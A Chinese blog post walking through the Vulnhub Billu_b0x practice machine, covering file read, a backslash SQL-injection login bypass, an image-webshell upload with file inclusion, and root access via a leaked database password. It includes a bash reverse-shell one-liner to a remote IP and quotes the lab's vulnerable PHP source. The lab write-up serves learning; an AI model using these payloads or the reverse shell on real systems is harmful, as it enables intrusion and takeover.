Vulhub-Billu_b0x靶机通关

已于 2023-03-30 12:00:53 修改
阅读量508 收藏
点赞数
文章标签: php 服务器 web安全
于 2023-03-29 22:23:52 首次发布
Aiwin
本文链接:https://blog.csdn.net/weixin_53090346/article/details/129846974
版权

文章目录

前言

在B站看见了什么必过百台靶机,于是随便找台玩玩。

一、下载地址

https://download.vulnhub.com/billu/Billu_b0x.zip

信息收集

  1. nmap直接扫一波IP,发现主机地址,并且直接扫靶机开放的端口,是否存在明显的漏洞等。

file

file

开放了80端口、服务器是apache和ssh的22端口,同时扫出了test.php。

拿Shell

  1. 前面扫出了test.php,直接进去查看一下,发现如下:

file

它说缺少file参数,个人感觉能直接进行文件下载,于是/etc/passwd试了试,果然可以,再访问80端口,发现index.php,它说可以进行sql注入,但是用常用的方法以及丢到了sqlmap都不行,于是把源码读取下来看看。

file

<?php
session_start();

include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{
	$_SESSION['logged']='';
	
}

if($_SESSION['logged']==true &&  $_SESSION['admin']!='')
{
	
	echo "you are logged in :)";
	header('Location: panel.php', true, 302);
}
else
{
echo '<div align=center style="margin:30px 0px 0px 0px;">
<font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font> 
<br><br>
Show me your SQLI skills <br>
<form method=post>
Username :- <Input type=text name=un> &nbsp Password:- <input type=password name=ps> <br><br>
<input type=submit name=login value="let\'s login">';
}
if(isset($_POST['login']))
{
	$uname=str_replace('\'','',urldecode($_POST['un']));
	$pass=str_replace('\'','',urldecode($_POST['ps']));
	$run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';
	$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {

$row = mysqli_fetch_assoc($result);
	   echo "You are allowed<br>";
	   $_SESSION['logged']=true;
	   $_SESSION['admin']=$row['username'];
	   
	 header('Location: panel.php', true, 302);
   
}
else
{
	echo "<script>alert('Try again');</script>";
}
	
}
echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff9933>Pirates</font> ";

?>

这里需要登录赋予了SESSION的值才能继续访问panel.php页面,并且对传入的参数将单引号过滤成了空格,但是缺陷在于使用了\,完全可以将pass也输入,完成逃逸,比如输入pass=\,uname=or 1=1#,那么语句就变成了select * from auth where pass=‘’ and uname=’ or 1=1#'; 语句变成了永真句,登录就成功了。

  1. 再通过test.php读取登录成功后panel.php页面的源代码进行分析
<?php
session_start();

include('c.php');
include('head2.php');
if(@$_SESSION['logged']!=true )
{
		header('Location: index.php', true, 302);
		exit();
	
}



echo "Welcome to billu b0x ";
echo '<form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form>';
if(isset($_POST['lg']))
{
	unset($_SESSION['logged']);
	unset($_SESSION['admin']);
	header('Location: index.php', true, 302);
}
echo '<hr><br>';

echo '<form method=post>

<select name=load>
    <option value="show">Show Users</option>
	<option value="add">Add User</option>
</select> 

 &nbsp<input type=submit name=continue value="continue"></form><br><br>';
if(isset($_POST['continue']))
{
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);
	
	if($choice==='add')
	{
       		include($dir.'/'.$choice.'.php');
			die();
	}
	
        if($choice==='show')
	{
        
		include($dir.'/'.$choice.'.php');
		die();
	}
	else
	{
		include($dir.'/'.$_POST['load']);
	}
	
}


if(isset($_POST['upload']))
{
	
	$name=mysqli_real_escape_string($conn,$_POST['name']);
	$address=mysqli_real_escape_string($conn,$_POST['address']);
	$id=mysqli_real_escape_string($conn,$_POST['id']);
	
	if(!empty($_FILES['image']['name']))
	{
		$iname=mysqli_real_escape_string($conn,$_FILES['image']['name']);
	$r=pathinfo($_FILES['image']['name'],PATHINFO_EXTENSION);
	$image=array('jpeg','jpg','gif','png');
	if(in_array($r,$image))
	{
		$finfo = @new finfo(FILEINFO_MIME); 
	$filetype = @$finfo->file($_FILES['image']['tmp_name']);
		if(preg_match('/image\/jpeg/',$filetype )  || preg_match('/image\/png/',$filetype ) || preg_match('/image\/gif/',$filetype ))
				{
					if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name']))
							 {
							  echo "Uploaded successfully ";
							  $update='insert into users(name,address,image,id) values(\''.$name.'\',\''.$address.'\',\''.$iname.'\', \''.$id.'\')'; 
							 mysqli_query($conn, $update);
							  
							}
				}
			else
			{
				echo "<br>i told you dear, only png,jpg and gif file are allowed";
			}
	}
	else
	{
		echo "<br>only png,jpg and gif file are allowed";
		
	}
}


}

?>

这里可以上传图片,对文件的后缀和文件的类型都进行了判断,只允许图片,但是可以看到continue进入到最后一个else能够进行文件包含,因此可以传图片马+文件包含的格式拿shell。

制作图片马

file

上传
file
拿shell成功
file

这里花费了很长的时间,开始用Hackbar进行的时候一直没包含成功,有点郁闷,后来换了下burpsuite就可以了,hackbar又发疯了0 。0

直接蚁剑连接就行,注意要加Cookie和POST的数据
file

当然如果不喜欢蚁剑,直接利用system命令+一句话bash反弹shell也是可以的,echo “bash -i >& /dev/tcp/120.79.29.170/5555 0>&1” | bash

提权

提权最简单粗暴的就是看系统,然后搜索系统的漏洞。
file
可以看到存在exp,把.c文件编译成可执行文件,然后wget提取进靶机,注意这里只有uploaded_images是有权限的,其它都是root,没有写入权限。

file

执行exp,结果执行失败了,也不知道啥原因,只能找其它了
file

直接都看目录的时候,还看到phpmy目录,访问一下,发现是phpmyadmin,并且整个目录的权限都是777。
file
既然跟数据库有关,那肯定得看下数据库的配置文件,结果看到了root的密码。
file
ssh连接成功

file

总结

主要考了sql注入和图片马+文件读取,文件包含的利用,跟CTF的一些基础考点类似,难度偏低。

M03-Aiwin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 2359
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解
qq_58091216的博客
09-25 964
13. 我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。15. 此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用 hydra 进行爆破。2) 查看数据库,切换到drupaldb数据库,查看查找默认的Drupal user 表,发现admin信息。5. 虚拟机开启之后需要登录,我们不知道密码,需要探活ip地址,网段知道:192.168.52.0/24。
prime1--vulnhub靶场通关教程
最新发布
m0_74402888的博客
04-29 1958
是一个常用的命令行工具,用于从或向服务器传输数据,支持多种协议,如 HTTP、HTTPS、FTP 等。如果你得到了任何正确的参数,就按照下面的步骤操作。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。之前扫到了ssh,http wordpress,那密码对应的是什么服务呢。在现实生活中的渗透测试中,我们应该使用我们的工具来深入挖掘一个网站。//查看location.txt文件,你将得到下一步的行动指示//vm 编辑--查看虚拟网络编辑器,看到靶机的网段。
Vulhub-DC-2靶场通关攻略
weixin_51339377的博客
03-16 747
arp-scan -l nmap -sV -p- 192.168.109.140 也可以执行如下命令 可以探测目标主机是否存活 nmap -T4 -sP 192.168.109.140 也可以尝试如下的命令 -A是主动扫描 -p设置的是端口 -oN可以把结果输出到文件 结果保存在root目标下 nmap -T4 -A 192.168.109.140 -p 1-65535 -oN haha.txt 想要访问可以进入如下...
DC-9 vulnhub靶场详细通关记录
weixin_62621015的博客
03-03 346
vulnhub靶场 DC-9个人通关记录 补充了很多细节和知识点,可以参考一下
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
qq_51577576的博客
03-05 1373
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
billu-b0x靶场渗透
11-14
billu-b0x靶场渗透
VMware-ovftool-4.4.0-15722219-win.x86_64.rar
05-03
《VMware ovftool在虚拟化管理中的应用与问题解析》 VMware ovftool,全称为OVF Tool,是一款由VMware公司推出的强大工具,主要用于处理OVF(Open Virtualization Format)和OVA(OVF Archive)文件,是虚拟化环境...
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups ...比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root G0rmint 基本渗透 BSides Vancuver:2018年 Toppo:1 Billu Box 2 基
vulnhub DC9——实战通关详细思路
m0_61506558的博客
11-06 983
(一)环境搭建(一)环境搭建在官网上下载.ova,直接打开就可以了。(二)主机发现。查看用户文件 ls -a查看root权限sudo -l查看历史命令 history 查看内核漏洞 uname -a
vulhub靶场文件(不用积分)
05-18
我下的挺慢,估计其他人也有这个情况。 使用Vulhub一键搭建漏洞测试靶场,下载日期2020/05/18。 kali下安装命令 apt-get install docker.io apt-get install docker-compose cd cd /vulhub/flask/ssti service docker start docker-compose up -d
Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2219
DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
Vulnhub靶场】ICA: 1 通关writeup
weixin_44588899的博客
05-22 1003
文章目录环境准备信息搜集漏洞利用权限提升 环境准备 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.132 信息搜集 nmap -T4 -p- -A 192.168.220.132 发现开放22、80、3306端口,先打开80端口,发现cms是qdPM9.2版本,在exp-db搜索漏.
靶机渗透日记 Billu_b0x
Anonymous
03-09 302
端口 访问 80 端口 目录扫描 /add.php 文件下存在文件上传 没有上传成功 /test.php 缺少 file 参数,构造URL http://ip/test.php?file=/etc/passwd 尝试不行,使用 post 方式 依次读取目录扫描到的文件 //add.php <?php echo '<form method="post" enctype="multipart/form-data"> Select image to ..
【每日打靶练习】vulnhub--Billu_b0x(中)
leo788的博客
02-16 234
主要利用这个靶场对文件包含以及任意文件下载进行巩固。
VulnHubbillu_b0x靶场复盘
redwand的博客
01-21 4559
此题目主要训练三方面要点,一是post方法下的文件包含,二是post方法下的getshell,三是[CVE-2015-1328]的利用。很多细节不错,值得入手一练。
Billu_b0x 靶机
m0_60945802的博客
04-18 2119
靶机Billu_b0x
红队打靶:billu_b0x打靶思路详解(vulnhub
Bossfrank的博客
07-17 2077
本文是vulhub靶机bulli_b0x的详细打靶过程,涉及到的知识点包括SQL注入、文件包含漏洞利用、php代码审计、图片马的制作等。靶机不难,但细节很多,信息搜集是关键!细节包括使用POST的方法寻找文件包含的漏洞参数、读取index.php的源码确定sql注入的逻辑、上传图片马、找到触发图片马执行的路径、反弹shell的指令要进行url编码、敏感文件搜索碰撞数据库密码与ssh账号密码等等。
靶机渗透(二)——Billu_b0x
qq_45751902的博客
04-18 1944
一、环境配置 kali:192.168.92.5 nat模式 靶机:192.168.92.3 nat模式 二、信息收集 1.扫描ip nmap -sP 192.168.92.0/24 2.端口扫描 半开扫描:nmap -sS 192.168.92.3 全开扫描:nmap -sT 192.168.92.3 3个过程全部完成叫全开扫描,最后一步不做,叫半开扫描。在实际过程中,半开扫描应用的最多,半开扫描不容易被目标电脑日志记录。 3.目录扫描 dirb http://192.168.92.3

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M03-Aiwin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值